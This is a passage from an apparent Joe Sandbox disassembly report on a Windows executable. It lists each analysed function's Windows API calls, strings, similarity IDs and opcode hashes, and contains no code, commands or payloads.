                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0020744C
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00207461
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00207480
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 256516436-0
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 0022645A
                                                            • GetDC.USER32(00000000), ref: 00226462
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0022646D
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00226479
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 002264B5
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002264C6
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00229299,?,?,000000FF,00000000,?,000000FF,?), ref: 00226500
                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00226520
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID:
                                                            • API String ID: 3864802216-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            APIs
                                                              • Part of subcall function 001A9997: __itow.LIBCMT ref: 001A99C2
                                                              • Part of subcall function 001A9997: __swprintf.LIBCMT ref: 001A9A0C
                                                              • Part of subcall function 001BFEC6: _wcscpy.LIBCMT ref: 001BFEE9
                                                            • _wcstok.LIBCMT ref: 0020EEFF
                                                            • _wcscpy.LIBCMT ref: 0020EF8E
                                                            • _memset.LIBCMT ref: 0020EFC1
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                            • String ID: X
                                                            • API String ID: 774024439-3081909835
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            APIs
                                                            • IsWindow.USER32(00B96640), ref: 0022B6A5
                                                            • IsWindowEnabled.USER32(00B96640), ref: 0022B6B1
                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0022B795
                                                            • SendMessageW.USER32(00B96640,000000B0,?,?), ref: 0022B7CC
                                                            • IsDlgButtonChecked.USER32(?,?), ref: 0022B809
                                                            • GetWindowLongW.USER32(00B96640,000000EC), ref: 0022B82B
                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0022B843
                                                            Similarity
                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                            • String ID:
                                                            • API String ID: 4072528602-0
                                                            APIs
                                                            • _memset.LIBCMT ref: 0021F75C
                                                            • _memset.LIBCMT ref: 0021F825
                                                            • ShellExecuteExW.SHELL32(?), ref: 0021F86A
                                                              • Part of subcall function 001A9997: __itow.LIBCMT ref: 001A99C2
                                                              • Part of subcall function 001A9997: __swprintf.LIBCMT ref: 001A9A0C
                                                              • Part of subcall function 001BFEC6: _wcscpy.LIBCMT ref: 001BFEE9
                                                            • GetProcessId.KERNEL32(00000000), ref: 0021F8E1
                                                            • CloseHandle.KERNEL32(00000000), ref: 0021F910
                                                            Strings
                                                            Similarity
                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                            • String ID: @
                                                            • API String ID: 3522835683-2766056989
                                                            APIs
                                                            • GetParent.USER32(?), ref: 0020149C
                                                            • GetKeyboardState.USER32(?), ref: 002014B1
                                                            • SetKeyboardState.USER32(?), ref: 00201512
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00201540
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0020155F
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 002015A5
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 002015C8
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            APIs
                                                            • GetParent.USER32(00000000), ref: 002012B5
                                                            • GetKeyboardState.USER32(?), ref: 002012CA
                                                            • SetKeyboardState.USER32(?), ref: 0020132B
                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00201357
                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00201374
                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002013B8
                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002013D9
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _wcsncpy$LocalTime
                                                            • String ID:
                                                            • API String ID: 2945705084-0
                                                            • Opcode ID: b23bfb558946648f20b57f14d4a71302d9778c3cc5dc8634b685cd735476bcf0
                                                            • Instruction ID: 69c6f03fdbe893c7bb505fad35d5a94e7ac6434321395a164f806bf9f17e6d2d
                                                            • Opcode Fuzzy Hash: b23bfb558946648f20b57f14d4a71302d9778c3cc5dc8634b685cd735476bcf0
                                                            • Instruction Fuzzy Hash: DF417169C2062876CB10EBB49886ECFB3AC9F25710F50895AF518E3162E734E715C7A9
                                                            APIs
                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 001FDAC5
                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001FDAFB
                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001FDB0C
                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001FDB8E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                            • String ID: ,,#$DllGetClassObject
                                                            • API String ID: 753597075-1925594170
                                                            • Opcode ID: 5977b4819c090bb1b1367b964831c64d58aad30ccbc45ac9bc526bafa355ac6c
                                                            • Instruction ID: ddac51c644cd6da96191e9021d59cf20b6e4d5180b8d20823a9650ba6c5f04ce
                                                            • Opcode Fuzzy Hash: 5977b4819c090bb1b1367b964831c64d58aad30ccbc45ac9bc526bafa355ac6c
                                                            • Instruction Fuzzy Hash: 014182B1600208EFDB15CF54D985ABABBBAEF45310F1681ADAE099F205D7B1DD44CBA0
                                                            APIs
                                                              • Part of subcall function 002048AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002038D3,?), ref: 002048C7
                                                              • Part of subcall function 002048AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002038D3,?), ref: 002048E0
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 002038F3
                                                            • _wcscmp.LIBCMT ref: 0020390F
                                                            • MoveFileW.KERNEL32(?,?), ref: 00203927
                                                            • _wcscat.LIBCMT ref: 0020396F
                                                            • SHFileOperationW.SHELL32(?), ref: 002039DB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 1377345388-1173974218
                                                            • Opcode ID: 8a16cfdfb8445a83afe029ad07cd4cdc4d721b1e15ccea4b4c3154ecaa8ba6a6
                                                            • Instruction ID: a865372158492747c1445946148cb899492076c69a0d6807dbe8f54f1a65bb98
                                                            • Opcode Fuzzy Hash: 8a16cfdfb8445a83afe029ad07cd4cdc4d721b1e15ccea4b4c3154ecaa8ba6a6
                                                            • Instruction Fuzzy Hash: 7F41A0B1418389AEC751EF64C481ADFB7ECAF99340F00092EF489C3192EB74D658CB52
                                                            APIs
                                                            • _memset.LIBCMT ref: 00227519
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002275C0
                                                            • IsMenu.USER32(?), ref: 002275D8
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00227620
                                                            • DrawMenuBar.USER32 ref: 00227633
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                            • String ID: 0
                                                            • API String ID: 3866635326-4108050209
                                                            • Opcode ID: ba38c4770762a880f630286461b68ec14afe2f4570120488eadf7dbaa9acda38
                                                            • Instruction ID: 0634a70fefd948fc251efa72d2165d3635d1127af6f9a7d3b0f85ce7db807490
                                                            • Opcode Fuzzy Hash: ba38c4770762a880f630286461b68ec14afe2f4570120488eadf7dbaa9acda38
                                                            • Instruction Fuzzy Hash: 53414C75A18619EFDB20DF95E984EAABBF8FF04310F448029F9259B250D730AD60CF90
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0022125C
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00221286
                                                            • FreeLibrary.KERNEL32(00000000), ref: 0022133D
                                                              • Part of subcall function 0022122D: RegCloseKey.ADVAPI32(?), ref: 002212A3
                                                              • Part of subcall function 0022122D: FreeLibrary.KERNEL32(?), ref: 002212F5
                                                              • Part of subcall function 0022122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00221318
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 002212E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 395352322-0
                                                            • Opcode ID: 4a1605d132e9f7654074a8d293010b167e166b6ab36fbdb63725777c8b8db8f4
                                                            • Instruction ID: 52ce09dfc556f018d10fa5ad1667c403e019b1b510e5e15a2e08a7945e3d9d1f
                                                            • Opcode Fuzzy Hash: 4a1605d132e9f7654074a8d293010b167e166b6ab36fbdb63725777c8b8db8f4
                                                            • Instruction Fuzzy Hash: 46310A71911129BFDB14DFD0EC89EFFB7BCEB18300F1001BAA901E2151DA749F659AA0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0022655B
                                                            • GetWindowLongW.USER32(00B96640,000000F0), ref: 0022658E
                                                            • GetWindowLongW.USER32(00B96640,000000F0), ref: 002265C3
                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 002265F5
                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0022661F
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00226630
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0022664A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$MessageSend
                                                            • String ID:
                                                            • API String ID: 2178440468-0
                                                            • Opcode ID: f3f3160f9fc203ae07aa9ac54657b5afdd7e3ae90489999df93ed55f4d8bf0da
                                                            • Instruction ID: 21e2f8aa61b13cf7fdfd71c05a3408b44b1db694256cd06a5ee66a91670a9263
                                                            • Opcode Fuzzy Hash: f3f3160f9fc203ae07aa9ac54657b5afdd7e3ae90489999df93ed55f4d8bf0da
                                                            • Instruction Fuzzy Hash: C2311532614161AFDB20CFA8EC8CF6537E9FB4A710F584168F5118B2B5CB72AC64DB81
                                                            APIs
                                                              • Part of subcall function 002180A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002180CB
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002164D9
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002164E8
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00216521
                                                            • connect.WSOCK32(00000000,?,00000010), ref: 0021652A
                                                            • WSAGetLastError.WSOCK32 ref: 00216534
                                                            • closesocket.WSOCK32(00000000), ref: 0021655D
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00216576
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 910771015-0
                                                            • Opcode ID: cb7f1525bf6c650e4cf61cd5ccc334975f490f671c09fd4f532edac47b06cf37
                                                            • Instruction ID: f7bd2b7e87cfc5c39392152340a29ac8d7e7aa121172e29f70b5720517350d0d
                                                            • Opcode Fuzzy Hash: cb7f1525bf6c650e4cf61cd5ccc334975f490f671c09fd4f532edac47b06cf37
                                                            • Instruction Fuzzy Hash: E531C131610118AFDB209F64DC89BBE7BF9EB55720F004069F90597291DB70AD95CBA1
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001FE0FA
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001FE120
                                                            • SysAllocString.OLEAUT32(00000000), ref: 001FE123
                                                            • SysAllocString.OLEAUT32 ref: 001FE144
                                                            • SysFreeString.OLEAUT32 ref: 001FE14D
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 001FE167
                                                            • SysAllocString.OLEAUT32(?), ref: 001FE175
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: cbbae1143758e6653b357f615b47dbba0753549973b1d9e2943c79c910c59651
                                                            • Instruction ID: c816302bbe56b3724a2a1d5a6fa42ff80abfe45d9ba37cd7c322ebfee3d8d2df
                                                            • Opcode Fuzzy Hash: cbbae1143758e6653b357f615b47dbba0753549973b1d9e2943c79c910c59651
                                                            • Instruction Fuzzy Hash: 49212C35604208BF9B20AFA9DD89DBB77ECEB09760B508235FA15CB261DB709C418B64
                                                            APIs
                                                              • Part of subcall function 001A1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 001A1D73
                                                              • Part of subcall function 001A1D35: GetStockObject.GDI32(00000011), ref: 001A1D87
                                                              • Part of subcall function 001A1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 001A1D91
                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002278A1
                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002278AE
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002278B9
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002278C8
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002278D4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • Opcode ID: 3b99b9b54011c9e73cbc4fbb0b73b9c25a09ead1a71c7415003b467de0e75c70
                                                            • Instruction ID: fa18c815ee11021963f72c86fc3b60adbc816570b064e1d5b784641ae30550c0
                                                            • Opcode Fuzzy Hash: 3b99b9b54011c9e73cbc4fbb0b73b9c25a09ead1a71c7415003b467de0e75c70
                                                            • Instruction Fuzzy Hash: 1711B2B251422ABFEF159FA0DC89EE77F6DEF08758F014114FA04A2090C7729C21DBA4
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,001C4292,?), ref: 001C41E3
                                                            • GetProcAddress.KERNEL32(00000000), ref: 001C41EA
                                                            • EncodePointer.KERNEL32(00000000), ref: 001C41F6
                                                            • DecodePointer.KERNEL32(00000001,001C4292,?), ref: 001C4213
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoInitialize$combase.dll
                                                            • API String ID: 3489934621-340411864
                                                            • Opcode ID: c1904d4207786ff031314487c37adc3431adfb9c8301862ae11cdd82a0214241
                                                            • Instruction ID: 2b62022c5777e0112998b07cc7408322804df2eb893005e16bb25949669de5a7
                                                            • Opcode Fuzzy Hash: c1904d4207786ff031314487c37adc3431adfb9c8301862ae11cdd82a0214241
                                                            • Instruction Fuzzy Hash: B0E01AB0690340EFEB60AFB0FD0DB043AA5BB66B02F50A4B8F455D50E0DBF540A68F00
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,001C41B8), ref: 001C42B8
                                                            • GetProcAddress.KERNEL32(00000000), ref: 001C42BF
                                                            • EncodePointer.KERNEL32(00000000), ref: 001C42CA
                                                            • DecodePointer.KERNEL32(001C41B8), ref: 001C42E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoUninitialize$combase.dll
                                                            • API String ID: 3489934621-2819208100
                                                            • Opcode ID: 75b8e9ea6f29ad893e9bfae759bf968ad068f65dca46d080b74f14f17bfc4d0f
                                                            • Instruction ID: c899799d27671cd5ced0e097e9220ebcc4de6d0597a58704a5e60cbe5747b065
                                                            • Opcode Fuzzy Hash: 75b8e9ea6f29ad893e9bfae759bf968ad068f65dca46d080b74f14f17bfc4d0f
                                                            • Instruction Fuzzy Hash: 89E0B6B8595300FBEB60ABA0FE0DB443AB4B726B42F1090B8F045E50A0CBF48595CB54
                                                            APIs
                                                            Similarity
                                                            • API ID: _memmove$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 3253778849-0
                                                            • Opcode ID: 93b3fe1bf09b770244ec23dce923942e0d514e4956ba1ddd2cbb217d59e0d148
                                                            • Instruction ID: 3fd0970c043111149f8ecf54edfcbf2a2eb26b433cbbc69d9a9f7a39838b5688
                                                            • Opcode Fuzzy Hash: 93b3fe1bf09b770244ec23dce923942e0d514e4956ba1ddd2cbb217d59e0d148
                                                            • Instruction Fuzzy Hash: C2619B3451065AABDF11EF60CC85EFE77A8AF26308F044519F8555B1D3DB30E965CB60
                                                            APIs
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                              • Part of subcall function 002210A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00220038,?,?), ref: 002210BC
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00220548
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00220588
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 002205AB
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002205D4
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00220617
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00220624
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                            • String ID:
                                                            • API String ID: 4046560759-0
                                                            • Opcode ID: 0c6d329a5cf948eb428523b1d7977d5287f8b9090faa19b0a8b9fb208a3a4b68
                                                            • Instruction ID: 50c41b8503188d0823c4dcaebdd8f99eb69f6511af7e9956d7f4fb54de9a62d3
                                                            • Opcode Fuzzy Hash: 0c6d329a5cf948eb428523b1d7977d5287f8b9090faa19b0a8b9fb208a3a4b68
                                                            • Instruction Fuzzy Hash: EB515A31118200AFC710EFA4D885E6FBBE9FF99314F04492DF545871A2DB71EA25CB52
                                                            APIs
                                                            • GetMenu.USER32(?), ref: 00225A82
                                                            • GetMenuItemCount.USER32(00000000), ref: 00225AB9
                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00225AE1
                                                            • GetMenuItemID.USER32(?,?), ref: 00225B50
                                                            • GetSubMenu.USER32(?,?), ref: 00225B5E
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00225BAF
                                                            Similarity
                                                            • API ID: Menu$Item$CountMessagePostString
                                                            • String ID:
                                                            • API String ID: 650687236-0
                                                            • Opcode ID: fbbea181665c646302db13af34d88c4ee2cd32097ccf165dc13090f0ab44e9a3
                                                            • Instruction ID: a71d66cbf72cd639a60a3ac485168d4edc57d11a7fd010e3cb46c56da7ad73c8
                                                            • Opcode Fuzzy Hash: fbbea181665c646302db13af34d88c4ee2cd32097ccf165dc13090f0ab44e9a3
                                                            • Instruction Fuzzy Hash: 34518F35A10626EFCF11EFA4D845AAEB7B4EF58324F1084A9F811B7351CB74AE518B90
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 001FF3F7
                                                            • VariantClear.OLEAUT32(00000013), ref: 001FF469
                                                            • VariantClear.OLEAUT32(00000000), ref: 001FF4C4
                                                            • _memmove.LIBCMT ref: 001FF4EE
                                                            • VariantClear.OLEAUT32(?), ref: 001FF53B
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 001FF569
                                                            Similarity
                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                            • String ID:
                                                            • API String ID: 1101466143-0
                                                            • Opcode ID: 7e18155a194f2fdb6f7f8458ed09f50c4f9f1dccd7ecc0b0f5002126d57ee3b0
                                                            • Instruction ID: c2ea17260c6726ad46ed6580aadaaf66a9e6ba10fe53b2d3ca2be34c9292c958
                                                            • Opcode Fuzzy Hash: 7e18155a194f2fdb6f7f8458ed09f50c4f9f1dccd7ecc0b0f5002126d57ee3b0
                                                            • Instruction Fuzzy Hash: 2B5158B5A00209AFCB14DF58D884AAAB7B9FF4C314F158169EA59DB310D770E912CBA0
                                                            APIs
                                                            • _memset.LIBCMT ref: 00202747
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00202792
                                                            • IsMenu.USER32(00000000), ref: 002027B2
                                                            • CreatePopupMenu.USER32 ref: 002027E6
                                                            • GetMenuItemCount.USER32(000000FF), ref: 00202844
                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00202875
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                            • String ID:
                                                            • API String ID: 3311875123-0
                                                            • Opcode ID: 53201d12facd2b2c113c78097a12378f4040092ba43dddfa8d04ff9289680bf5
